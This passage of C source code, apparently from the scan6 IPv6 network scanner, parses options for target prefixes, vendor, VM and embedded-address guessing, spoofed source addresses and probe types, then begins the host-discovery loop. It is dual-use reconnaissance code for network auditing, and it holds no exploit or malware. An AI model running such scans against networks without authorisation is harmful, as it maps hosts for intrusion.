"i:s:d:u:U:H:y:S:D:Lp:Z:o:a:X:P:qetx:O:fFV:bB:gk:K:w:W:m:Q:TNI:r:lz:c:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; init_iface_data(&idata); /* Initialize the scan_list structure (for remote scans) */ scan_list.target=target_list; scan_list.ntarget=0; scan_list.maxtarget= MAX_SCAN_ENTRIES; /* Initialize the prefix_list structure (for remote scans) */ prefix_list.target= tgt_pref_list; prefix_list.ntarget=0; prefix_list.maxtarget= MAX_PREF_ENTRIES; /* Initialize the iid_list structure (for remote scans/tracking) */ iid_list.prefix= tgt_iid_list; iid_list.nprefix=0; iid_list.maxprefix= MAX_IID_ENTRIES; while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &idata.srcaddr) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f=TRUE; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=TRUE; } break; case 'd': /* IPv6 Destination Address/Prefix */ if( (ranges= address_contains_ranges(optarg)) == 1){ charptr= optarg; charstart= rangestart; charend= rangeend; lastcolon= charend; while(*charptr && (optarg - charptr) <= MAX_RANGE_STR_LEN){ if(*charptr != '-'){ /* If we do not find a dash, just copy this 16-bit word to both the range start and the range end */ *charstart= *charptr; *charend= *charptr; charstart++; charend++; /* Record the address of the byte following the colon (in the range end), so that we know what to "overwrite when we find a "range */ if(*charptr==':') lastcolon= charend; charptr++; } else{ /* If we found a dash, we must "overwrite" the range end with what follows the dash */ charend= lastcolon; charptr++; while(*charptr && (optarg - charptr) <= MAX_RANGE_STR_LEN && *charptr !=':' && *charptr !='-'){ *charend= *charptr; charend++; charptr++; } } } /* Zero-terminate the strings that we have generated from the option arguements */ *charstart=0; *charend=0; tgt_range_f=TRUE; if(scan_list.ntarget <= scan_list.maxtarget){ if( (scan_list.target[scan_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, rangestart, &(scan_list.target[scan_list.ntarget]->start)) <= 0){ if(idata.verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, rangeend, &(scan_list.target[scan_list.ntarget]->end)) <= 0){ if(idata.verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); exit(EXIT_FAILURE); } scan_list.target[scan_list.ntarget]->cur= scan_list.target[scan_list.ntarget]->start; /* Check whether the start address is smaller than the end address */ for(i=0;i<7; i++) if( ntohs(scan_list.target[scan_list.ntarget]->start.s6_addr16[i]) > ntohs(scan_list.target[scan_list.ntarget]->end.s6_addr16[i])){ if(idata.verbose_f) puts("Error in Destination Address range: Start address larger than end address!"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(scan_list.target[scan_list.ntarget]->start))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(scan_list.target[scan_list.ntarget]->end))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } scan_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } if(prefix_list.ntarget <= prefix_list.maxtarget){ if( (prefix_list.target[prefix_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } /* Copy the recently added target to our prefix list */ *prefix_list.target[prefix_list.ntarget]= *scan_list.target[scan_list.ntarget - 1]; prefix_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } else if(ranges == 0){ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Destination Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(prefix.ip6)) <= 0){ puts("inet_pton(): Destination Address not valid"); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ prefix.len = atoi(charptr); if(prefix.len>128){ puts("Prefix length error in IPv6 Destination Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(prefix.ip6), prefix.len); } else{ prefix.len= 128; } if(prefix_list.ntarget <= prefix_list.maxtarget){ if( (prefix_list.target[prefix_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } prefix_to_scan(&prefix, prefix_list.target[prefix_list.ntarget]); if(IN6_IS_ADDR_MULTICAST(&(prefix_list.target[prefix_list.ntarget]->start))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(prefix_list.target[prefix_list.ntarget]->end))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } prefix_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } idata.dstaddr= prefix_list.target[0]->start; dst_f=TRUE; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=TRUE; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=TRUE; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=TRUE; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f=TRUE; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f=TRUE; break; case 'D': /* Destination Ethernet address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Destination Ethernet address."); exit(EXIT_FAILURE); } idata.hdstaddr_f=TRUE; break; case 'L': scan_local_f=TRUE; break; case 'p': /* Probe type */ if(strncmp(optarg, "echo", strlen("echo")) == 0){ probe_echo_f=TRUE; probetype= PROBE_ICMP6_ECHO; probe_f=TRUE; } else if(strncmp(optarg, "unrec", strlen("unrec")) == 0){ probe_unrec_f=TRUE; probetype= PROBE_UNREC_OPT; probe_f=TRUE; } else if(strncmp(optarg, "all", strlen("all")) == 0){ probe_echo_f=TRUE; probe_unrec_f=TRUE; /* For reote scans, we use a single probe type */ probetype= PROBE_ICMP6_ECHO; probe_f=TRUE; } else if(strncmp(optarg, "tcp", strlen("tcp")) == 0){ probetype= PROBE_TCP; probe_f=TRUE; } else{ puts("Error in '-p' option: Unknown probe type"); exit(EXIT_FAILURE); } break; case 'Z': /* Payload Size*/ rhbytes= atoi(optarg); rhbytes_f=TRUE; break; case 'o': /* TCP/UDP Source Port */ srcport= atoi(optarg); srcport_f=TRUE; break; case 'a': /* TCP/UDP Destination Port */ dstport= atoi(optarg); dstport_f=TRUE; break; case 'X': charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=TRUE; break; case 'P': /* Print type */ if(strncmp(optarg, "local", strlen("local")) == 0){ print_local_f=TRUE; print_f=TRUE; } else if(strncmp(optarg, "global", strlen("global")) == 0){ print_global_f=TRUE; print_f=TRUE; } else if(strncmp(optarg, "all", strlen("all")) == 0){ print_local_f=TRUE; print_global_f=TRUE; print_f=TRUE; } else{ puts("Error in '-P' option: Unknown address type"); exit(EXIT_FAILURE); } break; case 'q': print_unique_f=TRUE; break; case 'e': print_type= PRINT_ETHER_ADDR; break; case 't': timestamps_f=TRUE; break; case 'x': idata.local_retrans=atoi(optarg); break; case 'O': idata.local_timeout=atoi(optarg); break; case 'f': rand_src_f=TRUE; break; case 'F': rand_link_src_f=TRUE; break; case 'V': if(strncmp(optarg, "vbox", strlen("vbox")) == 0){ tgt_vm_f=TRUE; vm_vbox_f=TRUE; } else if(strncmp(optarg, "vmware", strlen("vmware")) == 0){ tgt_vm_f=TRUE; vm_vmware_f=TRUE; } else if(strncmp(optarg, "vmwarem", strlen("vmwarem")) == 0){ tgt_vm_f=TRUE; vm_vmwarem_f=TRUE; } else if(strncmp(optarg, "all", strlen("all")) == 0){ tgt_vm_f=TRUE; vm_vbox_f=TRUE; vm_vmware_f=TRUE; vm_vmwarem_f=TRUE; } else{ puts("Error in '-V' option: Unknown Virtualization Technology"); exit(EXIT_FAILURE); } break; case 'b': tgt_lowbyte_f=TRUE; break; case 'B': if(strncmp("ipv4-all", optarg, MAX_LINE_SIZE) == 0){ tgt_ipv4mapped32_f=TRUE; tgt_ipv4mapped64_f=TRUE; } else if(strncmp("ipv4-32", optarg, MAX_LINE_SIZE) == 0){ tgt_ipv4mapped32_f=TRUE; } else if(strncmp("ipv4-64", optarg, MAX_LINE_SIZE) == 0){ tgt_ipv4mapped64_f=TRUE; } else{ puts("Unknown encoding of IPv4-embedded IPv6 addresses in '-B' option"); exit(EXIT_FAILURE); } break; case 'g': tgt_portembedded_f=TRUE; break; case 'k': /* Target OUI */ /* In case the user entered an OUI as OO:UU:II:00:00:00, just copy the first 8 bytes of input (the OUI part) */ strncpy(oui_ascii, optarg, 8); oui_ascii[8]= 0; strncat(oui_ascii, oui_end, ETHER_ADDR_PLEN-Strnlen(oui_ascii, sizeof(oui_ascii))-1); if(ether_pton(oui_ascii, &oui, sizeof(oui)) == 0){ puts("Error in vendor IEEE OUI"); exit(EXIT_FAILURE); } tgt_oui_f=TRUE; break; case 'K': /* Target vendor */ /* In case the user entered an OUI as OO:UU:II:00:00:00, just copy the first 8 bytes of input (the OUI part) */ strncpy(vendor, optarg, MAX_IEEE_OUIS_LINE_SIZE-1); vendor[MAX_IEEE_OUIS_LINE_SIZE-1]= 0; tgt_vendor_f=TRUE; break; case 'w': /* Target known Interface Identifiers (IIDs) */ strncpy(knowniidsfile, optarg, MAX_FILENAME_SIZE-1); knowniidsfile[MAX_FILENAME_SIZE-1]=0; tgt_knowniidsfile_f=TRUE; break; case 'W': /* Target Interface Identifier (IIDs) */ if(iid_list.nprefix >= iid_list.maxprefix){ puts("Too many INterface Identifiers"); exit(EXIT_FAILURE); } if( (iid_list.prefix[iid_list.nprefix] = malloc(sizeof(struct prefix_entry))) == NULL){ puts("Not enough memory while storing Interface ID"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, optarg, &((iid_list.prefix[iid_list.nprefix])->ip6)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } iid_list.prefix[iid_list.nprefix]->len=128; iid_list.nprefix++; tgt_knowniids_f=TRUE; break; case 'm': /* Known prefixes file */ strncpy(knownprefixesfile, optarg, MAX_FILENAME_SIZE-1); knownprefixesfile[MAX_FILENAME_SIZE-1]=0; knownprefixes_f=TRUE; break; case 'Q': if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if(inet_pton(AF_INET, charptr, &(v4host.ip)) != 1){ puts("Error in Host IPv4 Address"); exit(EXIT_FAILURE); } v4hostaddr_f=TRUE; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ v4host.len = atoi(charptr); if(v4host.len>32){ puts("Prefix length error in Host IPv4 address"); exit(EXIT_FAILURE); } sanitize_ipv4_prefix(&v4host); v4hostprefix_f=TRUE; } else{ v4host.len=32; } break; case 'T': sort_ouis_f=TRUE; break; case 'N': rnd_probes_f=TRUE; break; case 'I': inc = atoi(optarg); inc_f=TRUE; break; case 'r': if( Strnlen(optarg, LINE_BUFFER_SIZE-1) >= (LINE_BUFFER_SIZE-1)){ puts("scan6: -r option is too long"); exit(EXIT_FAILURE); } sscanf(optarg, "%lu%s", &rate, line); line[LINE_BUFFER_SIZE-1]=0; if(strncmp(line, "pps", 3) == 0) pps_f=TRUE; else if(strncmp(line, "bps", 3) == 0) bps_f=TRUE; else{ puts("scan6: Unknown unit of for the rate limit ('-r' option). Unit should be 'bps' or 'pps'"); exit(EXIT_FAILURE); } break; case 'l': /* "Loop mode */ loop_f=TRUE; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=TRUE; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; case 'c': /* Configuration file */ strncpy(configfile, optarg, MAX_FILENAME_SIZE-1); configfile[MAX_FILENAME_SIZE-1]=0; configfile_f=TRUE; break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ /* XXX: This is rather ugly, but some local functions need to check for verbosity, and it was not warranted to pass &idata as an argument */ verbose_f= idata.verbose_f; if(geteuid()){ puts("scan6 needs superuser privileges to run"); exit(EXIT_FAILURE); } if(scan_local_f && !idata.iface_f){ puts("Must specify the network interface with the -i option when a local scan is selected"); exit(EXIT_FAILURE); } /* Must open the "Known IIDs" file now, since it might be non-readable for the unprivileged user */ if(tgt_knowniidsfile_f){ if( (knowniids_fp=fopen(knowniidsfile, "r")) == NULL){ perror("Error opening known IIDs file"); exit(EXIT_FAILURE); } } /* Must open the "Known IIDs" file now, since it might be non-readable for the unprivileged user */ if(knownprefixes_f){ if( (knownprefixes_fp=fopen(knownprefixesfile, "r")) == NULL){ perror("Error opening known prefixes file"); exit(EXIT_FAILURE); } dst_f=TRUE; } if(!dst_f && !scan_local_f){ if(idata.verbose_f) puts("Must specify either a destination prefix ('-d'), or a local scan ('-L')"); exit(EXIT_FAILURE); } if(!scan_local_f){ if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } } else{ if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } } release_privileges(); /* This loads prefixes, but not scan entries */ if(knownprefixes_f){ if(!load_knownprefix_entries(&scan_list, &prefix_list, knownprefixes_fp)){ puts("Couldn't load known IPv6 prefixes"); exit(EXIT_FAILURE); } } if(!inc_f) scan_list.inc=1; if(pps_f && bps_f){ puts("Cannot specify a rate-limit in bps and pps at the same time"); exit(EXIT_FAILURE); } if(pps_f){ if(rate < 1) rate=1; pktinterval= 1000000/rate; } if(bps_f){ switch(probetype){ case PROBE_UNREC_OPT: packetsize= MIN_IPV6_HLEN + sizeof(struct icmp6_hdr) + ICMPV6_ECHO_PAYLOAD_SIZE; break; case PROBE_ICMP6_ECHO: packetsize= MIN_IPV6_HLEN + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr) + ICMPV6_ECHO_PAYLOAD_SIZE; break; case PROBE_TCP: packetsize= MIN_IPV6_HLEN + sizeof(struct tcp_hdr) + rhbytes; break; } if(rate == 0 || ((packetsize * 8)/rate) <= 0) pktinterval= 1000000; else pktinterval= ((packetsize * 8)/rate) * 1000000; } /* We Default to 1000 pps */ if(!pps_f && !bps_f) pktinterval= 1000; if(!configfile_f){ strncpy(configfile, "/etc/ipv6toolkit.conf", MAX_FILENAME_SIZE); } if(tgt_vendor_f){ if(!process_config_file(configfile)){ puts("Error while processing configuration file"); exit(EXIT_FAILURE); } } if(loop_f && !dst_f){ puts("Loop mode '-l' set, but no targets ('-d') specified!"); puts("Note: '-l' option changed since IPv6 toolkit v1.3.4!"); } if(dst_f && !(tgt_ipv4mapped32_f || tgt_ipv4mapped64_f || tgt_lowbyte_f || tgt_oui_f || tgt_vendor_f || \ tgt_vm_f || tgt_range_f || tgt_portembedded_f || tgt_knowniids_f || tgt_knowniidsfile_f)){ tgt_bruteforce_f=TRUE; } if( (tgt_ipv4mapped32_f || tgt_ipv4mapped64_f) && !v4hostaddr_f){ puts("Error: Must IPv4 host address/prefix (with '--ipv4-host') if '--tgt-ipv4-embedded' is set"); exit(EXIT_FAILURE); } if(scan_local_f && (idata.type != DLT_EN10MB || loopback_f)){ puts("Error cannot apply local scan on a loopback or tunnel interface"); exit(EXIT_FAILURE); } if(!print_f){ print_local_f=TRUE; print_global_f=TRUE; } if(!probe_f){ probe_unrec_f=TRUE; probe_echo_f=TRUE; /* For remote scans we use a single probe type */ probetype=PROBE_ICMP6_ECHO; } /* If a Source Address (and *not* a "source prefix") has been specified, we need to incorporate such address in our iface_data structure. */ if(idata.srcaddr_f && !idata.srcprefix_f){ if( (idata.srcaddr.s6_addr16[0] & htons(0xffc0)) == htons(0xfe80)){ idata.ip6_local=idata.srcaddr; idata.ip6_local_flag=TRUE; } else{ if( (idata.ip6_global.prefix[idata.ip6_global.nprefix] = malloc(sizeof(struct prefix_entry))) \ == NULL){ if(idata.verbose_f){ puts("Not enough memory while saving global address"); } exit(EXIT_FAILURE); } (idata.ip6_global.prefix[idata.ip6_global.nprefix])->ip6=idata.srcaddr; idata.ip6_global.nprefix++; idata.ip6_global_flag=1; } } if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=TRUE; if(scan_local_f){ host_local.nhosts=0; host_local.maxhosts= MAX_IPV6_ENTRIES; host_local.host= host_locals; if(probe_echo_f){ if(multi_scan_local(idata.pfd, &idata, &(idata.ip6_local), PROBE_ICMP6_ECHO, ALL_NODES_MULTICAST_ADDR,\ &host_local) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with ICMPv6 Echo Requests"); exit(EXIT_FAILURE); } } if(probe_unrec_f){ if(multi_scan_local(idata.pfd, &idata, &(idata.ip6_local), PROBE_UNREC_OPT, ALL_NODES_MULTICAST_ADDR,\ &host_local) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with Unrecognized options"); exit(EXIT_FAILURE); } } if(print_local_f){ if(idata.verbose_f) puts("Link-local addresses:"); if(print_unique_f){ if(print_unique_host_entries(&host_local, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } else{ if(print_host_entries(&host_local, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } } if(print_global_f){ host_global.nhosts=0; host_global.maxhosts= MAX_IPV6_ENTRIES; host_global.host= host_globals; if(probe_echo_f){ if(find_local_globals(idata.pfd, &idata, PROBE_ICMP6_ECHO, ALL_NODES_MULTICAST_ADDR,\ &host_global) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with ICMPv6 Echo Requests"); exit(EXIT_FAILURE); } } if(probe_unrec_f){ if(find_local_globals(idata.pfd, &idata, PROBE_UNREC_OPT, ALL_NODES_MULTICAST_ADDR,\ &host_global) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with Unrecognized options"); exit(EXIT_FAILURE); } } host_candidate.nhosts=0; host_candidate.maxhosts= MAX_IPV6_ENTRIES; host_candidate.host= host_candidates; if(create_candidate_globals(&idata, &host_local, &host_global, &host_candidate) == -1){ if(idata.verbose_f) puts("Error while creating candidate global addresses"); exit(EXIT_FAILURE); } if(validate_host_entries(idata.pfd, &idata, &host_candidate, &host_global) == -1){ if(idata.verbose_f) puts("Error while validating global entries"); exit(EXIT_FAILURE); } if(idata.verbose_f) puts("\nGlobal addresses:"); if(print_unique_f){ if(print_unique_host_entries(&host_global, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } else{ if(print_host_entries(&host_global, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } } } /* Remote scan */ else{ if(tgt_knowniids_f){ if(!load_knowniid_entries(&scan_list, &prefix_list, &iid_list)){ puts("Couldn't load known IID IPv6 addresses"); exit(EXIT_FAILURE); } } if(tgt_knowniidsfile_f){ if(!load_knowniidfile_entries(&scan_list, &prefix_list, knowniids_fp)){ puts("Couldn't load known IID IPv6 addresses"); exit(EXIT_FAILURE); } fclose(knowniids_fp); } if(tgt_portembedded_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_embeddedport_entries(&scan_list, prefix_list.target[i])){ puts("Couldn't load embedded-port IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_lowbyte_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_lowbyte_entries(&scan_list, prefix_list.target[i])){ puts("Couldn't load prefixes for low-byte IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_ipv4mapped32_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_ipv4mapped32_entries(&scan_list, prefix_list.target[i], &v4host)){ puts("Couldn't load prefixes for IPv4-embeded (32-bit) IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_ipv4mapped64_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_ipv4mapped64_entries(&scan_list, prefix_list.target[i], &v4host)){ puts("Couldn't load prefixes for IPv4-embeded (64-bit) IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_vm_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_vm_entries(&scan_list, prefix_list.target[i], &v4host)){ puts("Couldn't load prefix for IEEE OUI"); exit(EXIT_FAILURE); } } } if(tgt_oui_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_oui_entries(&scan_list, prefix_list.target[i], &oui)){ puts("Couldn't load prefix for IEEE OUI"); exit(EXIT_FAILURE); } } } if(tgt_vendor_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_vendor_entries(&scan_list, prefix_list.target[i], vendor)){ puts("Couldn't load prefixes for the specified vendor"); exit(EXIT_FAILURE); } } } if(tgt_bruteforce_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_bruteforce_entries(&scan_list, prefix_list.target[i])){ puts("Couldn't load prefixes for the specified destination prefix"); exit(EXIT_FAILURE); } } } if(idata.verbose_f){ printf("Target address ranges (%d)\n", scan_list.ntarget); if(!print_scan_entries(&scan_list)){ puts("Error while printing target address ranges"); exit(EXIT_FAILURE); } } if(!scan_local_f && !idata.ip6_global_flag){ if(idata.verbose_f) puts("Cannot obtain a global address to scan remote network"); exit(EXIT_FAILURE); } switch(probetype){ case PROBE_ICMP6_ECHO: if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_ERQNSNA_FILTER, 0, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } break; case PROBE_UNREC_OPT: if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_ERRORNSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } break; case PROBE_TCP: if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCP_NSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } break; } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ if(idata.verbose_f>1) printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); if(idata.verbose_f) puts("\nAlive nodes:"); FD_ZERO(&sset); FD_SET(idata.fd, &sset); lastprobe.tv_sec= 0; lastprobe.tv_usec=0; idata.pending_write_f=TRUE; while(!end_f){ rset= sset; wset= sset; eset= sset; if(!donesending_f){ timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; } else{ timeout.tv_usec=0; timeout.tv_sec= SELECT_TIMEOUT; } /* Check for readability and exceptions. We only check for writeability if there is pending data to send (the pcap descriptor will usually be writeable!). */ if((sel=select(idata.fd+1, &rset, (idata.pending_write_f?&wset:NULL), &eset, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ perror("scan6:"); exit(EXIT_FAILURE); } } if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } /* Check whether we have finished probing all targets */ if(donesending_f){ /* If we're not looping, just wait for SELECT_TIMEOUT seconds for any incoming responses. If we are looping (most likely because we're doing host-tracking, wait for nsleep seconds, and reset the targets. */ if(!loop_f){ if(is_time_elapsed(&curtime, &lastprobe, SELECT_TIMEOUT * 1000000)){ end_f=TRUE; } } else{ if(is_time_elapsed(&curtime, &lastprobe, nsleep * 1000000)){ reset_scan_list(&scan_list); donesending_f=FALSE; continue; } } } /* If we didn't check for writeability in the previous call to select(), we must do it now. Otherwise, we might block when trying to send a packet. */ if(!donesending_f && !idata.pending_write_f){ wset= sset; timeout.tv_usec=0; timeout.tv_sec= 0; if( (sel=select(idata.fd+1, NULL, &wset, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ perror("scan6:"); exit(EXIT_FAILURE); } } } if(FD_ISSET(idata.fd, &rset)){ error_f=FALSE; if((result=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ if(idata.verbose_f) printf("Error while reading packet in main loop: pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(result == 1){ pkt_ether = (struct ether_header *) 